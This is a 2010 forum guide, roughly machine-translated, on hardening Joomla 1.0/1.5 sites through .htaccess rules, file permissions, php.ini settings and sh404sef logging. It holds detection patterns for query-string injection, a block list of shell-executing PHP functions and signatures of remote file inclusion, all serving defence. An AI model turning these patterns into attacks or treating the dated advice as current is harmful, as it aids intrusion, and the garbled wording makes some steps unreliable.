Welcome Guest ( Log In | Register )

 Forum Rules Extensions Support
 
Reply to this topicStart new topic
> Ultimate Security For Joomla, secure your joomla! cms
Web Design Seo
post Jul 15 2010, 01:56 PM
Post #1


Web Design Seo
****

Group: Root Admin
Posts: 3,320
Joined: 29-April 09
From: Sofia
Member No.: 1



Ultra high security for your Joomla CMS

Цитат
This guide is written in 2010 year and is for Joomla 1.5 and Joomla! 1.0 only!


Not that I'm not such a big security specialist, but I have to handle as it is my job. These things work, are tested at more than 100 sites and problems with them so far not detected.


How to protect Joomla with high security:

1. part. Use the latest version. This does not paranoid to frequently updated after each new - I recommend viewing the log of changes to update and if in newest version is Security updates or if something else catches your eye.

2. Part. You must have working .htaccess file in public_html directory. Active means after installation of Joomla to rename file htaccess.txt to standard. Htaccess. It protects your site such as the deduction of most server-level attacks - mainly mosConfig var in URL, and script injection.

Responsible for this protection is that part of the code in htaccess:
Код
RewriteCond %{QUERY_STRING} mosConfig_[a-zA-Z_]{1,21}(=|\%3D) [OR]
# Block out any script trying to base64_encode crap to send via URL
RewriteCond %{QUERY_STRING} base64_encode.*\(.*\) [OR]
# Block out any script that includes a <script> tag in URL
RewriteCond %{QUERY_STRING} (\<|%3C).*script.*(\>|%3E) [NC,OR]
# Block out any script trying to set a PHP GLOBALS variable via URL
RewriteCond %{QUERY_STRING} GLOBALS(=|\[|\%[0-9A-Z]{0,2}) [OR]
# Block out any script trying to modify a _REQUEST variable via URL
RewriteCond %{QUERY_STRING} _REQUEST(=|\[|\%[0-9A-Z]{0,2})
# Send all blocked request to homepage with 403 Forbidden error!
RewriteRule ^(.*)$ index.php [F,L]


3 Part. Configure .htaccess.

Код
<Files ~ "\.xml|\.ini$">
Order allow,deny
Deny from all
Satisfy all
</Files>


It does not allow opening a URL address. Xml and. Ini files to see their content.
Thus, the first will not steal your language files (for Joomla 1.5) second and more important: not to be seen what use and what version exactly. Similarly, you can add any more file endings to not be visible from all (if you think you need).
Note: The files can be ekzekyutvani of php scripts, which means that your site will work, but files with these endings can be just shouting in php script.

3.2 Make sure you have this code in htaccess:
Код
Options +FollowSymLinks -Indexes

-Indexes mean it will not show contents of directories with no index file in them. If you have a directory site and there is no index.html - nobody but you can not see the contents as a list.

3.3 If you want to stop access dounload managers and some proxies to your site you need this code:

Код
# Block proxy and download managers
RewriteCond %{HTTP:VIA}                 !^$ [OR]
RewriteCond %{HTTP:FORWARDED}           !^$ [OR]
RewriteCond %{HTTP:USERAGENT_VIA}       !^$ [OR]
RewriteCond %{HTTP:X_FORWARDED_FOR}     !^$ [OR]
RewriteCond %{HTTP:PROXY_CONNECTION}    !^$ [OR]
RewriteCond %{HTTP:XPROXY_CONNECTION}   !^$ [OR]
RewriteCond %{HTTP:HTTP_PC_REMOTE_ADDR} !^$ [OR]
RewriteCond %{HTTP:XROXY_CONNECTION}    !^$ [OR]
RewriteCond %{HTTP:X-FORWARDED-FOR}     !^$ [OR]
RewriteCond %{HTTP:FORWARDED-FOR}       !^$ [OR]
RewriteCond %{HTTP:X-FORWARDED}         !^$ [OR]
RewriteCond %{HTTP:HTTP_CLIENT_IP}      !^$
RewriteRule ^(.*)$ - [F]

# Block Bad Bots
RewriteCond %{HTTP_USER_AGENT} ^BlackWidow [OR]
RewriteCond %{HTTP_USER_AGENT} ^Bot\ mailto:craftbot@yahoo.com [OR]
RewriteCond %{HTTP_USER_AGENT} ^ChinaClaw [OR]
RewriteCond %{HTTP_USER_AGENT} ^Custo [OR]
RewriteCond %{HTTP_USER_AGENT} ^DISCo [OR]
RewriteCond %{HTTP_USER_AGENT} ^Download\ Demon [OR]
RewriteCond %{HTTP_USER_AGENT} ^eCatch [OR]
RewriteCond %{HTTP_USER_AGENT} ^EirGrabber [OR]
RewriteCond %{HTTP_USER_AGENT} ^EmailSiphon [OR]
RewriteCond %{HTTP_USER_AGENT} ^EmailWolf [OR]
RewriteCond %{HTTP_USER_AGENT} ^Express\ WebPictures [OR]
RewriteCond %{HTTP_USER_AGENT} ^ExtractorPro [OR]
RewriteCond %{HTTP_USER_AGENT} ^EyeNetIE [OR]
RewriteCond %{HTTP_USER_AGENT} ^FlashGet [OR]
RewriteCond %{HTTP_USER_AGENT} ^GetRight [OR]
RewriteCond %{HTTP_USER_AGENT} ^GetWeb! [OR]
RewriteCond %{HTTP_USER_AGENT} ^Go!Zilla [OR]
RewriteCond %{HTTP_USER_AGENT} ^Go-Ahead-Got-It [OR]
RewriteCond %{HTTP_USER_AGENT} ^GrabNet [OR]
RewriteCond %{HTTP_USER_AGENT} ^Grafula [OR]
RewriteCond %{HTTP_USER_AGENT} ^HMView [OR]
RewriteCond %{HTTP_USER_AGENT} HTTrack [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^Image\ Stripper [OR]
RewriteCond %{HTTP_USER_AGENT} ^Image\ Sucker [OR]
RewriteCond %{HTTP_USER_AGENT} Indy\ Library [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^InterGET [OR]
RewriteCond %{HTTP_USER_AGENT} ^Internet\ Ninja [OR]
RewriteCond %{HTTP_USER_AGENT} ^JetCar [OR]
RewriteCond %{HTTP_USER_AGENT} ^JOC\ Web\ Spider [OR]
RewriteCond %{HTTP_USER_AGENT} ^larbin [OR]
RewriteCond %{HTTP_USER_AGENT} ^LeechFTP [OR]
RewriteCond %{HTTP_USER_AGENT} ^Mass\ Downloader [OR]
RewriteCond %{HTTP_USER_AGENT} ^MIDown\ tool [OR]
RewriteCond %{HTTP_USER_AGENT} ^Mister\ PiX [OR]
RewriteCond %{HTTP_USER_AGENT} ^Navroad [OR]
RewriteCond %{HTTP_USER_AGENT} ^NearSite [OR]
RewriteCond %{HTTP_USER_AGENT} ^NetAnts [OR]
RewriteCond %{HTTP_USER_AGENT} ^NetSpider [OR]
RewriteCond %{HTTP_USER_AGENT} ^Net\ Vampire [OR]
RewriteCond %{HTTP_USER_AGENT} ^NetZIP [OR]
RewriteCond %{HTTP_USER_AGENT} ^Octopus [OR]
RewriteCond %{HTTP_USER_AGENT} ^Offline\ Explorer [OR]
RewriteCond %{HTTP_USER_AGENT} ^Offline\ Navigator [OR]
RewriteCond %{HTTP_USER_AGENT} ^PageGrabber [OR]
RewriteCond %{HTTP_USER_AGENT} ^Papa\ Foto [OR]
RewriteCond %{HTTP_USER_AGENT} ^pavuk [OR]
RewriteCond %{HTTP_USER_AGENT} ^pcBrowser [OR]
RewriteCond %{HTTP_USER_AGENT} ^RealDownload [OR]
RewriteCond %{HTTP_USER_AGENT} ^ReGet [OR]
RewriteCond %{HTTP_USER_AGENT} ^SiteSnagger [OR]
RewriteCond %{HTTP_USER_AGENT} ^SmartDownload [OR]
RewriteCond %{HTTP_USER_AGENT} ^SuperBot [OR]
RewriteCond %{HTTP_USER_AGENT} ^SuperHTTP [OR]
RewriteCond %{HTTP_USER_AGENT} ^Surfbot [OR]
RewriteCond %{HTTP_USER_AGENT} ^tAkeOut [OR]
RewriteCond %{HTTP_USER_AGENT} ^Teleport\ Pro [OR]
RewriteCond %{HTTP_USER_AGENT} ^VoidEYE [OR]
RewriteCond %{HTTP_USER_AGENT} ^Web\ Image\ Collector [OR]
RewriteCond %{HTTP_USER_AGENT} ^Web\ Sucker [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebAuto [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebCopier [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebFetch [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebGo\ IS [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebLeacher [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebReaper [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebSauger [OR]
RewriteCond %{HTTP_USER_AGENT} ^Website\ eXtractor [OR]
RewriteCond %{HTTP_USER_AGENT} ^Website\ Quester [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebStripper [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebWhacker [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebZIP [OR]
RewriteCond %{HTTP_USER_AGENT} ^Wget [OR]
RewriteCond %{HTTP_USER_AGENT} ^Widow [OR]
RewriteCond %{HTTP_USER_AGENT} ^WWWOFFLE [OR]
RewriteCond %{HTTP_USER_AGENT} ^Xaldon\ WebSpider [OR]
RewriteCond %{HTTP_USER_AGENT} ^Zeus
RewriteRule .* - [F]


Warning: The code does not stop most of the proxies, but only because some verification is user agent, and most proxies are presented for a version of Mozilla.

Warning: code cited above must be less than that в htaccess:
Код
RewriteEngine On
RewriteBase /


4 Part. Watch you do not have rights to the folders 777 and files with rights higher than 644. Of any self-respecting company hosting rights of the folders by default (when creating new) are 755 and files are 644.
Note: You need not check all folders in your Joomla installation, just make a new folder and see what her rights are 755 If everything is OK.

5 Part. Check rates directory of Joomla! outside the public html. Make a new folder name with a complex of more than 12 letters and symbols. Then there otredaktirayte configuration.php and set the new path. Then delete the files in the directory standard rate.

6 Part. Check logs directory with the Joomla! outside the public html. Make a new folder named with a complex of more than 12 letters and symbols. Then there otredaktirayte configuration.php and set the new path. Then delete the files in the standard log directory.

7 Part. Move configuration.php outside public html and secure it!
How to make this:

Step 1 : Move configuration.php in other directory outside public_html.
Step 2: Modify: /includes/defines.php and /administrator/includes/defines.php files - this constant: define( 'JPATH_CONFIGURATION', JPATH_ROOT );

If the file you want to move up one level in the folder named "test" constant should look like:
Код
define( 'JPATH_CONFIGURATION', JPATH_ROOT.DS.'..'.DS.'test' );


Step 3: Make sure that configuration.php is not writable by all rights of the file should be 444!

8 Part. Make sure that the following settings of PHP on your hosting account are correct:
register_globals - must be Off
register_globals might allow an attacker to take control of hidden variables through poorly written Joomla! extensions.

safe_mode - must be Off.
safe_mode is a security risk; it was supposed to add a new layer of security to PHP, but it ended up creating more bugs.

allow_url_fopen - must be Off
allow_url_fopen might allow an attacker to include his own PHP scripts in your Joomla! website, ultimately taking control of the webserver.

allow_url_include - must be Off
allow_url_include might allow an attacker to include his own PHP scripts in your Joomla! website, ultimately taking control of the webserver.

disable_functions - recommended.
disable_functions disables dangerous PHP functions. It is recommended to disable: show_source, system, shell_exec, passthru, exec, phpinfo, popen, proc_open

open_basedir - recommended. open_basedir restricts access to specified directories only.

All these things are corrected by the following code that we write in a php.ini file in public_html and put our directory.
Код
register_globals=Off
safe_mode=Off
allow_url_fopen=Off
allow_url_include=Off
disable_functions=show_source, system, shell_exec, passthru, exec, phpinfo, popen, proc_open
open_basedir=/home/path_to_your_account/public_html


Note: path_to_your_account is the way to your hosting account.
Second Note: some of these settings can be globally banned from your hosting provider and does not work, if so - how and ask them why and if not kaharete tell you that it can - only important register_globals and safe_mode.

At the bottom I attached a sample php.ini - file - php.ini.txt. Download it, rename it to php.ini and upload to public_html.

9 Part. Check that the admin account by default is "admin". If so, rename it!
Check whether your password is secure enough! If your password is weak, no sense of anything of those things there, hackers will simply dress in entered input. A secure password is something like this: Ttsx#jfn024Rp2Agt5s

10 Part. Change the rights of these files from your template default:
public_html/templates/your_template/params.ini
public_html/templates/your_template/index.php

Rights of these files must be 444!

11 Part. Only for Joomla 1.0:

Change the rights of language files (such as bulgarian.php, english.php). They must be 444!
The same applies to the index file from your default template - public_html / templates / template / index.php

12 Part. Do not install any junk in your Joomla, the more you have additional applications, the greater is the chance to hack you.

13 Part. I strongly recommend installing sh404sef ! It serves not only for rewriting URL addresses to your article rank higher in Google, but also for filtering and protection from certain attacks. You can download the latest free version of the component here

To activate security:
- Open configuration: administrator/index.php?option=com_sh404sef&task=showconfig
- To see all the settings you click on the right: Click here to switch to extended display.

Recommended settings:
Отидете на таб Security.
Activate security functions -  Yes.
Log attacks -  Yes.
Months to keep security logs - Give it 2-3 months, it is advisable to view logs at least once a week if you have visited quite a site or even 1-2 times a day (like me).


Pay attention in logs to:
script tag in POST = Script injection
Image file name with command in URL = remote file inclusion
mosConfig var in URL
Base64 injection
Illegal standard vars

You can then banned you want in those hackers. Htaccess Sample code:
Код
deny from 89.110.1.195
deny from 89.110.14.105
deny from 89.110.21.155
deny from 89.110.25.55


or addresses from-to (these two lines are from some particularly stubborn Russian hackers smile.gif
Код
deny from 92.100.128.0-92.100.255.255
deny from 89.110.0.0-89.110.63.255


Anti-flood configuration
Activate anti-flood - put Yes only if your site is exposed to attacks of the type: Click 10 times per second oligophrenia to overload your host. Configure tries, put setup record and navigate the site with firefox - so it caught most often. Note that a much visited website that always reduces the percentage of attendance in nyakakvav it, because Google bot sometimes see an error page.

Project Honey Pot configuration.
Use Project Honey Pot - Yes.
I recommend you do if your site is unique within the 0000-2000 daily. Unfortunately, the inclusion of this pretty setting server load if you have a site with over 4000-5000 unique (one of our) and then have to look custom solution.

Make your registration on the site of Project Honey Pot and type into your access key. This automatically protects your site from all identified "bad" bots through a list of "black" IP addresses that are updated on this site - Project Honey Pot daily.

Is possible if you use the logs can choose to disable the option: Log 404 errors. It leads to large amounts of log entries and if you view often, you'll read a really long:) The setting is located in the Advanced tab in the settings sh404sef.

14 Part. DO NOT install any junk in your Joomla, if you use more extensions, the chance to hack you is greater.

15 Part. Did you do anything? Congratulations, now you have a great site with the best CMS system in the world and your website is more secure than at least 90% of sites on the Internet.

If anyone knows something more valuable than all that, let's share it, it will be added in the first post. Rights of folders and files are possible even more paranoid settings, but then many features on your site will not work.

Guide is written by Eduard Dimitrov, CEO of 3D Web Design.

Enjoy cool.gif
Our Google Plus pages: | 3D Web Design in Google+

Attached File(s)
Attached File  php.ini.txt ( 226bytes ) Number of downloads: 8
 


--------------------
Правила на форума | Forum Rules | How to receive support. 3D Web Design: Уеб дизайн, Seo оптимизация, Web Site Extensions, Oscommerce Addons, Wordpress plugins and Joomla Extensions. Изработка на уеб сайтове и оптимизация на сайт за търсачки и Seo услуги.
Go to the top of the page
 
+Quote Post
Web Design Seo
post Sep 25 2010, 09:26 AM
Post #2


Web Design Seo
****

Group: Root Admin
Posts: 3,320
Joined: 29-April 09
From: Sofia
Member No.: 1



This will help you too: How To Remove Joomla Fingerprints, New Joomla 1.5.26 And Joomla 2.5 JCE Exploit and Remote File Inclusion Protection Code For .htaccess.

You can read here other htaccess guides also.


--------------------
Правила на форума | Forum Rules | How to receive support. 3D Web Design: Уеб дизайн, Seo оптимизация, Web Site Extensions, Oscommerce Addons, Wordpress plugins and Joomla Extensions. Изработка на уеб сайтове и оптимизация на сайт за търсачки и Seo услуги.
Go to the top of the page
 
+Quote Post

Reply to this topicStart new topic
1 User(s) are reading this topic (1 Guests and 0 Anonymous Users)
0 Members:

Collapse

> Similar Topics

  Topic Replies Topic Starter Views Last Action
No new Pinned: Topic has attachmentsJoomla Scraper, Grabber For Joomla
Joomla Scraper Can Grab Any Content From Any Website
66 Web Design Seo 38,280 11th April 2014 - 03:00 PM
Last post by: ataman79
No new Pinned: Joomla Pagination Seo Plugin
SEO plugin for Joomla Pagination that work in all Joomla
28 Web Design Seo 20,707 24th February 2014 - 04:58 PM
Last post by: Web Design Seo
No New Posts Pinned: Joomla Scraper Affiliate Sensation
Affiliate program (reseller program)
0 Web Design Seo 410 24th February 2014 - 03:34 PM
Last post by: Web Design Seo
No New Posts Pinned: Joomla Scraper Licenses And Prices
more updates and more licenses info
0 Web Design Seo 336 24th February 2014 - 03:26 PM
Last post by: Web Design Seo
No new Joomla Scraper Questions
19 doukousou 872 17th February 2014 - 06:42 PM
Last post by: Web Design Seo
No new Pinned: Joomla Aggregator Platinum Functions
aggregator for joomla, updated on 06 January 2013
19 Web Design Seo 22,997 13th January 2014 - 09:01 AM
Last post by: Web Design Seo
No New Posts Format Lost In Post By E-mail
3 gibor 378 9th January 2014 - 07:00 AM
Last post by: Web Design Seo
No new Joomla Scraper Cron Fail
9 r3d4sh 1,340 4th January 2014 - 11:20 PM
Last post by: 4FootyFans
No New Posts Joomla Pagination Seo Plugin Not Working After Update To 2.5.14
1 rone 2,001 14th August 2013 - 01:14 PM
Last post by: Web Design Seo
No new Pinned: Joomla Scraper Integration With K2
better integration of Joomla Scraper and K2
7 Web Design Seo 12,732 9th May 2013 - 04:50 AM
Last post by: nzgeo


 



RSS Lo-Fi Version Time is now: 18th April 2014 - 05:31 AM

Web Analytics